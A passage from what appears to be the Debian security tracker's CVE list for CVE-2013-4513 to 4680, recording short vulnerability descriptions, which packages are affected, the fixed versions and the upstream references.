vulnerability in the sofortueberweisung2commerce extensi ...) NOT-FOR-US: sofortueberweisung2commerce extension TYPO3 CVE-2013-4680 (Open redirect vulnerability in Maag Form Captcha extension 2.0.0 and e ...) NOT-FOR-US: meta_feedit extension for TYPO3 CVE-2013-4679 (Symantec Workspace Virtualization before 6.x before 6.4.1953.0, when a ...) NOT-FOR-US: Symantec Workspace Virtualization CVE-2013-4678 (The NDMP protocol implementation in Symantec Backup Exec 2010 R3 befor ...) NOT-FOR-US: Symantec Backup Exec CVE-2013-4677 (Symantec Backup Exec 2010 R3 before 2010 R3 SP3 and 2012 before SP2 us ...) NOT-FOR-US: Symantec Backup Exec CVE-2013-4676 (Multiple cross-site scripting (XSS) vulnerabilities in Symantec Backup ...) NOT-FOR-US: Symantec Backup Exec CVE-2013-4675 RESERVED CVE-2013-4674 (Cross-site scripting (XSS) vulnerability in the Web Email Protection c ...) NOT-FOR-US: Symantec CVE-2013-4673 (The management console on the Symantec Web Gateway (SWG) appliance bef ...) NOT-FOR-US: Symantec CVE-2013-4672 (The management console on the Symantec Web Gateway (SWG) appliance bef ...) NOT-FOR-US: Symantec CVE-2013-4671 (Cross-site request forgery (CSRF) vulnerability in the management cons ...) NOT-FOR-US: Symantec CVE-2013-4670 (Multiple cross-site scripting (XSS) vulnerabilities in the management ...) NOT-FOR-US: Symantec CVE-2013-4668 (Directory traversal vulnerability in File Roller 3.6.x before 3.6.4, 3 ...) - file-roller 3.8.3-1 [squeeze] - file-roller (Doesn't use libarchive) [wheezy] - file-roller (Doesn't use libarchive) NOTE: http://www.ocert.org/advisories/ocert-2013-001.html CVE-2013-4667 RESERVED CVE-2013-4666 RESERVED CVE-2013-4665 (SPBAS Business Automation Software 2012 has CSRF. ...) NOT-FOR-US: SPBAS Business Automation Software CVE-2013-4664 (SPBAS Business Automation Software 2012 has XSS. ...) NOT-FOR-US: SPBAS Business Automation Software CVE-2013-4663 (git_http_controller.rb in the redmine_git_hosting plugin for Redmine a ...) NOT-FOR-US: Redmine plugin redmine_git_hosting CVE-2013-4662 (The Quick Search API in CiviCRM 4.2.0 through 4.2.9 and 4.3.0 through ...) - civicrm (Fixed before initial upload to the archive) CVE-2013-4661 (CiviCRM 2.0.0 through 4.2.9 and 4.3.0 through 4.3.3 does not properly ...) - civicrm (Fixed before initial upload to the archive) CVE-2013-4660 (The JS-YAML module before 2.0.5 for Node.js parses input without prope ...) NOT-FOR-US: js-yaml CVE-2013-4659 (Buffer overflow in Broadcom ACSD allows remote attackers to execute ar ...) NOT-FOR-US: Broadcom ACSD CVE-2013-4658 (Linksys EA6500 has SMB Symlink Traversal allowing symbolic links to be ...) NOT-FOR-US: Linksys CVE-2013-4657 (Symlink Traversal vulnerability in NETGEAR WNR3500U and WNR3500L due t ...) NOT-FOR-US: NETGEAR CVE-2013-4656 (Symlink Traversal vulnerability in ASUS RT-AC66U and RT-N56U due to mi ...) NOT-FOR-US: ASUS CVE-2013-4655 (Symlink Traversal vulnerability in Belkin N900 due to misconfiguration ...) NOT-FOR-US: Belkin CVE-2013-4654 (Symlink Traversal vulnerability in TP-LINK TL-WDR4300 and TL-1043ND.. ...) NOT-FOR-US: TP-LINK CVE-2013-4653 (Multiple cross-site scripting (XSS) vulnerabilities in the signin func ...) NOT-FOR-US: Alcatel-Lucent Omnitouch CVE-2013-4652 (Unspecified vulnerability in the command-line management interface on ...) NOT-FOR-US: Siemens CVE-2013-4651 (Siemens Scalance W7xx devices with firmware before 4.5.4 use the same ...) NOT-FOR-US: Siemens CVE-2013-4650 (MongoDB 2.4.x before 2.4.5 and 2.5.x before 2.5.1 allows remote authen ...) - mongodb 1:2.4.5-1 (bug #715007) [squeeze] - mongodb (Only affects 2.4.x) [wheezy] - mongodb (Only affects 2.4.x) CVE-2013-4649 (Cross-site scripting (XSS) vulnerability in DotNetNuke (DNN) before 6. ...) NOT-FOR-US: DotNetNuke CVE-2013-4648 RESERVED CVE-2013-4647 RESERVED CVE-2013-4646 RESERVED CVE-2013-4645 RESERVED CVE-2013-4644 RESERVED CVE-2013-4643 RESERVED CVE-2013-4642 RESERVED CVE-2013-4641 RESERVED CVE-2013-4640 RESERVED CVE-2013-4639 RESERVED CVE-2013-4638 RESERVED CVE-2013-4637 RESERVED CVE-2013-4669 (FortiClient before 4.3.5.472 on Windows, before 4.0.3.134 on Mac OS X, ...) NOT-FOR-US: FortiClient CVE-2013-4636 (The mget function in libmagic/softmagic.c in the Fileinfo component in ...) - php5 5.5.0+dfsg-1 [squeeze] - php5 (Introduced with 10367fa7c6a4a2cf9bee02d8905e284185428f09) [wheezy] - php5 (Introduced with 10367fa7c6a4a2cf9bee02d8905e284185428f09) - file (bug in code modified for PHP) NOTE: Tested with the squeeze and wheezy versions CVE-2013-4635 (Integer overflow in the SdnToJewish function in jewish.c in the Calend ...) - php5 5.5.0+dfsg-1 (unimportant) NOTE: exploitable by malicious scripts only CVE-2013-4634 (SQL injection vulnerability in the jQuery autocomplete for indexed_sea ...) NOT-FOR-US: rzautocomplete extension for TYPO3 CVE-2013-4633 (Huawei Seco Versatile Security Manager (VSM) before V200R002C00SPC300 ...) NOT-FOR-US: Huawei Seco Versatile Security Manager CVE-2013-4632 (The Huawei Access Router (AR) before V200R002SPC003 allows remote atta ...) NOT-FOR-US: The Huawei Access Router CVE-2013-4631 (Huawei AR 150, 200, 1200, 2200, and 3200 routers, when SNMPv3 is enabl ...) NOT-FOR-US: Huawei AR 150, 200, 1200, 2200, and 3200 routers, CVE-2013-4630 (Stack-based buffer overflow on Huawei AR 150, 200, 1200, 2200, and 320 ...) NOT-FOR-US: Huawei routers CVE-2013-4629 (The Huawei viewpoint VP9610 and VP9620 units for the Huawei Video Conf ...) NOT-FOR-US: Huawei viewpoint CVE-2013-4628 (The firewall module on the Huawei Quidway Service Process Unit (SPU) b ...) NOT-FOR-US: Huawei Quidway Service Process Unit CVE-2013-4627 (Unspecified vulnerability in bitcoind and Bitcoin-Qt 0.8.x allows remo ...) - bitcoin 0.8.3-1 CVE-2013-4626 (Cross-site scripting (XSS) vulnerability in the BackWPup plugin before ...) NOT-FOR-US: WordPress plugin BackWPup CVE-2013-4625 (Cross-site scripting (XSS) vulnerability in files/installer.cleanup.ph ...) NOT-FOR-US: WordPress plugin Duplicator CVE-2013-4624 (Multiple cross-site scripting (XSS) vulnerabilities in Jahia xCM 6.6.1 ...) NOT-FOR-US: Jahia xCM CVE-2013-4623 (The x509parse_crt function in x509.h in PolarSSL 1.1.x before 1.1.7 an ...) {DSA-2782-1} - polarssl 1.2.8-1 (low; bug #719954) CVE-2013-4622 (The 3G Mobile Hotspot feature on the HTC Droid Incredible has a defaul ...) NOT-FOR-US: HTC Droid Incredible CVE-2013-4621 (Magnolia CMS before 4.5.9 has multiple access bypass vulnerabilities ...) NOT-FOR-US: Magnolia CMS CVE-2013-4620 (Cross-site scripting (XSS) vulnerability in interface/main/onotes/offi ...) NOT-FOR-US: OpenEMR CVE-2013-4619 (Multiple SQL injection vulnerabilities in OpenEMR 4.1.1 allow remote a ...) NOT-FOR-US: OpenEMR CVE-2013-4618 RESERVED CVE-2013-4617 (Jahia xCM before 6.6.2 does not include the HTTPOnly flag in a Set-Coo ...) NOT-FOR-US: Jahia xCM CVE-2013-4616 (The WifiPasswordController generateDefaultPassword method in Preferenc ...) NOT-FOR-US: Apple iOS CVE-2013-4615 (The Canon MG3100, MG5300, MG6100, MP495, MX340, MX870, MX890, MX920, a ...) NOT-FOR-US: EMC Smarts Network Configuration Manager CVE-2013-4614 (English/pages_MacUS/wls_set_content.html on the Canon MG3100, MG5300, ...) NOT-FOR-US: EMC Smarts Network Configuration Manager CVE-2013-4613 (The default configuration of the administrative interface on the Canon ...) NOT-FOR-US: EMC RSA Data Protection Manager Appliance CVE-2013-4612 (Multiple cross-site scripting (XSS) vulnerabilities in REDCap before 5 ...) NOT-FOR-US: REDCap CVE-2013-4611 (Multiple unspecified vulnerabilities in REDCap before 5.1.1 allow remo ...) NOT-FOR-US: REDCap CVE-2013-4610 (Unspecified vulnerability in the Data Search utility in data-entry for ...) NOT-FOR-US: REDCap CVE-2013-4609 (REDCap before 5.0.4 and 5.1.x before 5.1.3 does not reject certain und ...) NOT-FOR-US: REDCap CVE-2013-4608 (Cross-site scripting (XSS) vulnerability in REDCap before 5.0.6 allows ...) NOT-FOR-US: REDCap CVE-2013-4607 RESERVED CVE-2013-4606 RESERVED CVE-2013-4605 RESERVED CVE-2013-4604 (Fortinet FortiOS before 5.0.3 on FortiGate devices does not properly r ...) NOT-FOR-US: Fortinet FortiOS CVE-2013-4603 RESERVED CVE-2013-4602 (A Denial of Service (infinite loop) vulnerability exists in Avira Anti ...) NOT-FOR-US: Avira CVE-2013-4601 RESERVED CVE-2013-4600 (Multiple cross-site scripting (XSS) vulnerabilities in Alkacon OpenCms ...) NOT-FOR-US: Alkacon OpenCms CVE-2013-4599 (The Misery module 6.x-2.x before 6.x-2.5 and 7.x-2.x before 7.x-2.2 fo ...) NOT-FOR-US: Drupal module misery CVE-2013-4598 (The Groups, Communities and Co (GCC) module 7.x-1.x before 7.x-1.1 for ...) NOT-FOR-US: Drupal module GCC CVE-2013-4597 (The Revisioning module 7.x-1.x before 7.x-1.6 for Drupal does not prop ...) NOT-FOR-US: Drupal module Revisioning CVE-2013-4596 (The Node Access Keys module 7.x-1.x before 7.x-1.1 for Drupal does not ...) NOT-FOR-US: Drupal module Node Access Keys CVE-2013-4595 (The Secure Pages module 6.x-2.x before 6.x-2.0 for Drupal does not pro ...) NOT-FOR-US: Drupal module Secure Pages CVE-2013-4594 (The Payment for Webform module 7.x-1.x before 7.x-1.5 for Drupal does ...) NOT-FOR-US: Drupal module Payment for Webform CVE-2013-4593 (RubyGem omniauth-facebook has an access token security vulnerability ...) - ruby-omniauth-facebook (Fixed before initial release) CVE-2013-4592 (Memory leak in the __kvm_set_memory_region function in virt/kvm/kvm_ma ...) - linux 3.8-1 - linux-2.6 [squeeze] - linux-2.6 (Too intrusive to backport, KVM server not supported in squeeze-lts) [wheezy] - linux 3.2.53-1 CVE-2013-4591 (Buffer overflow in the __nfs4_get_acl_uncached function in fs/nfs/nfs4 ...) - linux 3.8-1 [wheezy] - linux (Introduced in 3.6) - linux-2.6 (Introduced in 3.6) NOTE: http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=12d6e7538e2d418c08f082b1b44ffa5fb7270ed8 NOTE: http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=e40f193f5bb022e927a57a4f5d5194e4f12ddb74 CVE-2013-4590 (Apache Tomcat before 6.0.39, 7.x before 7.0.50, and 8.x before 8.0.0-R ...) {DSA-3530-1 DLA-91-1} - tomcat6 6.0.39 (low) [squeeze] - tomcat6 (Minor issue) - tomcat7 7.0.50 (low) [wheezy] - tomcat7 (Minor issue) - tomcat8 8.0.0 CVE-2013-4589 (The ExportAlphaQuantumType function in export.c in GraphicsMagick befo ...) - graphicsmagick 1.3.18-1 (low; bug #729661) [squeeze] - graphicsmagick (Minor issue) [wheezy] - graphicsmagick (Minor issue) CVE-2013-4588 (Multiple stack-based buffer overflows in net/netfilter/ipvs/ip_vs_ctl. ...) {DSA-2906-1} - linux (fixed in 2.6.33) - linux-2.6 2.6.37-1 NOTE: 2.6.37-1 first version including 2.6.33 in unstable for linux-2.6 NOTE: https://git.kernel.org/linus/04bcef2a83f40c6db24222b27a52892cba39dffb NOTE: http://seclists.org/fulldisclosure/2013/Nov/77 CVE-2013-4587 (Array index error in the kvm_vm_ioctl_create_vcpu function in virt/kvm ...) {DSA-2906-1} - linux 3.12.5-1 - linux-2.6 [wheezy] - linux 3.2.54-1 CVE-2013-4586 RESERVED CVE-2013-4585 RESERVED CVE-2013-4584 (Perdition before 2.2 may have weak security when handling outbound con ...) - perdition 2.1-1 (low; bug #729028) [wheezy] - perdition (Minor issue) [squeeze] - perdition (Minor issue) CVE-2013-4583 (The parse_cmd function in lib/gitlab_shell.rb in GitLab 5.0 before 5.4 ...) - gitlab (Fixed before initial upload to Debian) CVE-2013-4582 (The (1) create_branch, (2) create_tag, (3) import_project, and (4) for ...) - gitlab (Fixed before initial upload to Debian) CVE-2013-4581 (GitLab 5.0 before 5.4.2, Community Edition before 6.2.4, Enterprise Ed ...) - gitlab (Fixed before initial upload to Debian) CVE-2013-4580 (GitLab before 5.4.2, Community Edition before 6.2.4, and Enterprise Ed ...) - gitlab (Fixed before initial upload to Debian) CVE-2013-4579 (The ath9k_htc_set_bssid_mask function in drivers/net/wireless/ath/ath9 ...) - linux-2.6 (ath9k not yet present) - linux 3.12.8-1 (bug #729573) [wheezy] - linux 3.2.54-1 NOTE: http://www.mathyvanhoef.com/2013/11/unmasking-spoofed-mac-address.html CVE-2013-4578 (jarsigner in OpenJDK and Oracle Java SE before 7u51 allows remote atta ...) - openjdk-7 7u51-2.4.4-1 - openjdk-6 6b30-1.13.1-1 CVE-2013-4577 (A certain Debian patch for GNU GRUB uses world-readable permissions fo ...) - grub2 2.00-20 (unimportant; bug #632598) NOTE: Additional hardening for rare setups, not a vulnerability CVE-2013-4576 (GnuPG 1.x before 1.4.16 generates RSA keys using sequences of introduc ...) {DSA-2821-1} - gnupg 1.4.15-3 CVE-2013-4575 (Heap-based buffer overflow in the utility program in the Linux agent i ...) NOT-FOR-US: Symantec Backup Exec CVE-2013-4574 (Cross-site scripting (XSS) vulnerability in the TimeMediaHandler exten ...) NOT-FOR-US: TimedMediaHandler mediawiki extension NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=56699 CVE-2013-4573 (Cross-site scripting (XSS) vulnerability in the ZeroRatedMobileAccess ...) NOT-FOR-US: mediawiki extension ZeroRatedMobileAccess CVE-2013-4572 (The CentralNotice extension for MediaWiki before 1.19.9, 1.20.x before ...) {DSA-2891-1} - mediawiki 1:1.19.8+dfsg-2.2 (bug #729629) [squeeze] - mediawiki NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=53032 CVE-2013-4571 (Buffer overflow in php-luasandbox in the Scribuntu extension for Media ...) NOT-FOR-US: php-luasandbox / Scribunto mediawiki extension NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=49705 CVE-2013-4570 (The zend_inline_hash_func function in php-luasandbox in the Scribuntu ...) NOT-FOR-US: php-luasandbox / Scribunto mediawiki extension NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=54527 CVE-2013-4569 (The CleanChanges extension for MediaWiki before 1.19.9, 1.20.x before ...) NOT-FOR-US: mediawiki extension CleanChanges CVE-2013-4568 (Incomplete blacklist vulnerability in Sanitizer::checkCss in MediaWiki ...) {DSA-2891-1} - mediawiki 1:1.19.8+dfsg-2.2 (bug #729629) [squeeze] - mediawiki NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=55332 CVE-2013-4567 (Incomplete blacklist vulnerability in Sanitizer::checkCss in MediaWiki ...) {DSA-2891-1} - mediawiki 1:1.19.8+dfsg-2.2 (bug #729629) [squeeze] - mediawiki NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=55332 CVE-2013-4566 (mod_nss 1.0.8 and earlier, when NSSVerifyClient is set to none for the ...) - libapache2-mod-nss 1.0.8-4 (low; bug #731627) [wheezy] - libapache2-mod-nss (Minor issue) CVE-2013-4565 (Heap-based buffer overflow in the __OLEdecode function in ppthtml 0.5. ...) - xlhtml (low; bug #729279) [wheezy] - xlhtml (Minor issue) [squeeze] - xlhtml (Minor issue) CVE-2013-4564 (Libreswan 3.6 allows remote attackers to cause a denial of service (cr ...) - libreswan (Fixed before initial upload to Debian) NOTE: https://libreswan.org/security/CVE-2013-4564/CVE-2013-4564.txt.asc NOTE: https://github.com/libreswan/libreswan/commit/9b31deafbdbf0c2206358dfbf2d4e343e365f23f CVE-2013-4563 (The udp6_ufo_fragment function in net/ipv6/udp_offload.c in the Linux ...) - linux-2.6 (Introduced in v3.10-rc5) - linux 3.11.10-1 [wheezy] - linux (Introduced in v3.10-rc5) NOTE: Introduced: http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=1e2bd517c108816220f262d7954b697af03b5f9c NOTE: fixed in: http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=0e033e0 CVE-2013-4562 (The omniauth-facebook gem 1.4.1 before 1.5.0 does not properly store t ...) - ruby-omniauth-facebook (Fixed before initial release) NOTE: https://github.com/mkdynamic/omniauth-facebook/commit/ccfcc26fe7e34acbd75ad4a095fd01ce5ff48ee7 CVE-2013-4561 RESERVED NOT-FOR-US: OpenShift CVE-2013-4560 (Use-after-free vulnerability in lighttpd before 1.4.33 allows remote a ...) {DSA-2795-1} - lighttpd 1.4.33-1+nmu1 (bug #729453) CVE-2013-4559 (lighttpd before 1.4.33 does not check the return value of the (1) setu ...) {DSA-2795-1} - lighttpd 1.4.33-1+nmu1 (bug #729453) CVE-2013-4558 (The get_parent_resource function in repos.c in mod_dav_svn Apache HTTP ...) - subversion 1.7.14-1 [squeeze] - subversion (Only affects 1.7.11 through 1.7.13 and 1.8.1 through 1.8.4) [wheezy] - subversion (Only affects 1.7.11 through 1.7.13 and 1.8.1 through 1.8.4) NOTE: http://subversion.apache.org/security/CVE-2013-4558-advisory.txt CVE-2013-4557 (The Security Screen (_core_/securite/ecran_securite.php) before 1.1.8 ...) {DSA-2794-1} - spip 2.1.24-1 (bug #729172) CVE-2013-4556 (Cross-site scripting (XSS) vulnerability in the author page (prive/for ...) {DSA-2794-1} - spip 2.1.24-1 (bug #729172) CVE-2013-4555 (Cross-site request forgery (CSRF) vulnerability in ecrire/action/logou ...) {DSA-2794-1} - spip 2.1.24-1 (bug #729172) CVE-2013-4554 (Xen 3.0.3 through 4.1.x (possibly 4.1.6.1), 4.2.x (possibly 4.2.3), an ...) - xen (Doesn't affect Linux) CVE-2013-4553 (The XEN_DOMCTL_getmemlist hypercall in Xen 3.4.x through 4.3.x (possib ...) {DSA-3006-1} - xen 4.4.0-1 [squeeze] - xen (Unsupported in squeeze-lts) CVE-2013-4552 (lib/Auth/Source/External.php in the drupalauth module before 1.2.2 for ...) NOT-FOR-US: drupalauth module for simpleSAMLphp CVE-2013-4551 (Xen 4.2.x and 4.3.x, when nested virtualization is disabled, does not ...) - xen 4.4.0-1 [wheezy] - xen (Only affects 4.2.x and later) [squeeze] - xen (Only affects 4.2.x and later) CVE-2013-4550 (Bip before 0.8.9, when running as a daemon, writes SSL handshake error ...) - bip 0.8.9-1 (low) [wheezy] - bip (Minor issue) [squeeze] - bip (Minor issue) NOTE: Upstream commit: https://projects.duckcorp.org/projects/bip/repository/revisions/df45c4c2d6f892e3e1dec23ce0ed2575b53a7d8c NOTE: https://projects.duckcorp.org/issues/261 NOTE: Difference between CVE-2011-5268 and CVE-2013-4550: https://www.openwall.com/lists/oss-security/2014/01/02/9 CVE-2013-4549 (QXmlSimpleReader in Qt before 5.2 allows context-dependent attackers t ...) - qtbase-opensource-src 5.1.1+dfsg-6 - qt4-x11 4:4.8.5+git192-g085f851+dfsg-1 (low; bug #750141) [wheezy] - qt4-x11 (Minor issue) [squeeze] - qt4-x11 (Minor issue) NOTE: https://codereview.qt-project.org/#change,70708 CVE-2013-4548 (The mm_newkeys_from_blob function in monitor_wrap.c in sshd in OpenSSH ...) - openssh 1:6.4p1-1 (bug #729029) [wheezy] - openssh (AES-GCM support introduced in 6.2) [squeeze] - openssh (AES-GCM support introduced in 6.2) CVE-2013-4547 (nginx 0.8.41 through 1.4.3 and 1.5.x before 1.5.7 allows remote attack ...) {DSA-2802-1} - nginx 1.4.4-1 (bug #730012) [squeeze] - nginx (Only applies to 0.8.41 - 1.5.6) CVE-2013-4546 (The repository import feature in gitlab-shell before 1.7.4, as used in ...) - gitlab (Fixed before initial upload to Debian) CVE-2013-4545 (cURL and libcurl 7.18.0 through 7.32.0, when built with OpenSSL, disab ...) {DSA-2798-1} - curl 7.33.0-1 CVE-2013-4544 (hw/net/vmxnet3.c in QEMU 2.0.0-rc0, 1.7.1, and earlier allows local gu ...) - qemu 2.0.0+dfsg-1 [wheezy] - qemu (Introduced in 1.4) [squeeze] - qemu (Introduced in 1.4) - qemu-kvm (Introduced in 1.4) NOTE: see BTS bug #744213 CVE-2013-4543 REJECTED CVE-2013-4542 (The virtio_scsi_load_request function in hw/scsi/scsi-bus.c in QEMU be ...) - qemu 2.1+dfsg-1 (low; bug #739589) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [squeeze] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) NOTE: virtio-scsi support introduced in v1.1: http://wiki.qemu.org/ChangeLog/1.1 CVE-2013-4541 (The usb_device_post_load function in hw/usb/bus.c in QEMU before 1.7.2 ...) - qemu 2.1+dfsg-1 (low; bug #739589) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [squeeze] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-4540 (Buffer overflow in scoop_gpio_handler_update in QEMU before 1.7.2 migh ...) - qemu 2.1+dfsg-1 (low; bug #739589) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [squeeze] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-4539 (Multiple buffer overflows in the tsc210x_load function in hw/input/tsc ...) - qemu 2.1+dfsg-1 (low; bug #739589) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [squeeze] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-4538 (Multiple buffer overflows in the ssd0323_load function in hw/display/s ...) - qemu 2.1+dfsg-1 (low; bug #739589) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [squeeze] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-4537 (The ssi_sd_transfer function in hw/sd/ssi-sd.c in QEMU before 1.7.2 al ...) - qemu 2.1+dfsg-1 (low; bug #739589) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [squeeze] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-4536 RESERVED - qemu 2.1+dfsg-1 (low; bug #739589) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [squeeze] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-4535 (The virtqueue_map_sg function in hw/virtio/virtio.c in QEMU before 1.7 ...) - qemu 2.1+dfsg-1 (low; bug #739589) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [squeeze] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-4534 (Buffer overflow in hw/intc/openpic.c in QEMU before 1.7.2 allows remot ...) - qemu 2.1+dfsg-1 (low; bug #739589) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [squeeze] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-4533 (Buffer overflow in the pxa2xx_ssp_load function in hw/arm/pxa2xx.c in ...) - qemu 2.1+dfsg-1 (low; bug #739589) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [squeeze] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-4532 (Qemu 1.1.2+dfsg to 2.1+dfsg suffers from a buffer overrun which could ...) - qemu 2.1+dfsg-1 (low; bug #739589) [squeeze] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-4531 (Buffer overflow in target-arm/machine.c in QEMU before 1.7.2 allows re ...) - qemu 2.1+dfsg-1 (low; bug #739589) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [squeeze] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-4530 (Buffer overflow in hw/ssi/pl022.c in QEMU before 1.7.2 allows remote a ...) - qemu 2.1+dfsg-1 (low; bug #739589) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) [squeeze] - qemu (Minor issue, hardly exploitable in practice) - qemu-kvm CVE-2013-4529 (Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remot ...) - qemu 2.1+dfsg-1 (low; bug #739589) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) [squeeze] - qemu (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-4528 REJECTED CVE-2013-4527 (Buffer overflow in hw/timer/hpet.c in QEMU before 1.7.2 might allow re ...) - qemu 2.1+dfsg-1 (low; bug #739589) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [squeeze] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-4526 (Buffer overflow in hw/ide/ahci.c in QEMU before 1.7.2 allows remote at ...) - qemu 2.1+dfsg-1 (low; bug #739589) [squeeze] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu (Minor issue, hardly exploitable in practice) [wheezy] - qemu-kvm (Minor issue, hardly exploitable in practice) - qemu-kvm (low) [squeeze] - qemu-kvm (Minor issue, hardly exploitable in practice) CVE-2013-4525 (Cross-site scripting (XSS) vulnerability in mod/quiz/report/responses/ ...) - moodle 2.5.3-1 [squeeze] - moodle (Vulnerable code not present) CVE-2013-4524 (Directory traversal vulnerability in repository/filesystem/lib.php in ...) - moodle 2.5.3-1 [squeeze] - moodle (Vulnerable code not present) CVE-2013-4523 (Cross-site scripting (XSS) vulnerability in message/lib.php in Moodle ...) - moodle 2.5.3-1 [squeeze] - moodle (Unsupported in squeeze-lts) CVE-2013-4522 (lib/filelib.php in Moodle through 2.2.11, 2.3.x before 2.3.10, 2.4.x b ...) - moodle 2.5.3-1 (low) [squeeze] - moodle (Vulnerable code not present) CVE-2013-4521 (RichFaces implementation in Nuxeo Platform 5.6.0 before HF27 and 5.8.0 ...) NOT-FOR-US: Nuxeo CVE-2013-4520 (xslt.c in libxslt before 1.1.25 allows context-dependent attackers to ...) - libxslt (The versions in wheezy and squeeze contain the full patch) CVE-2013-4519 (Multiple cross-site scripting (XSS) vulnerabilities in Review Board 1. ...) - reviewboard (bug #653113) CVE-2013-4518 (RHUI (Red Hat Update Infrastructure) 2.1.3 has world readable PKI enti ...) NOT-FOR-US: Red Hat Update Infrastructure CVE-2013-4517 (Apache Santuario XML Security for Java before 1.5.6, when applying Tra ...) - libxml-security-java 1.5.6-1 (bug #733938) [squeeze] - libxml-security-java (Minor issue, too intrusive to backport) [wheezy] - libxml-security-java (Minor issue, too intrusive to backport) NOTE: http://santuario.apache.org/secadv.data/cve-2013-4517.txt.asc CVE-2013-4516 (The mp_get_count function in drivers/staging/sb105x/sb_pci_mp.c in the ...) - linux 3.12-1 (unimportant) [wheezy] - linux (Affected code not present yet) - linux-2.6 (Affected code not present yet) NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=a8b33654b1e3b0c74d4a1fed041c9aae50b3c427 NOTE: Not enabled in Debian kernels; staging drivers are not supported CVE-2013-4515 (The bcm_char_ioctl function in drivers/staging/bcm/Bcmchar.c in the Li ...) - linux 3.12-1 (unimportant) NOTE: bcm driver not built - linux-2.6 (Affected code not present yet) NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8d1e72250c847fa96498ec029891de4dc638a5ba NOTE: Not enabled in Debian kernels; staging drivers are not supported CVE-2013-4514 (Multiple buffer overflows in drivers/staging/wlags49_h2/wl_priv.c in t ...) - linux 3.12-1 (unimportant) NOTE: wlags49_h2 driver not built - linux-2.6 (Affected code not present yet) NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b5e2f339865fb443107e5b10603e53bbc92dc054 NOTE: Not enabled in Debian kernels; staging drivers are not supported CVE-2013-4513 (Buffer overflow in the oz_cdev_write function in drivers/staging/ozwpa ...) - linux 3.12-1 (unimportant) [wheezy] - linux (Affected code not present yet) - linux-2.6 (Affected code not present yet) NOTE: 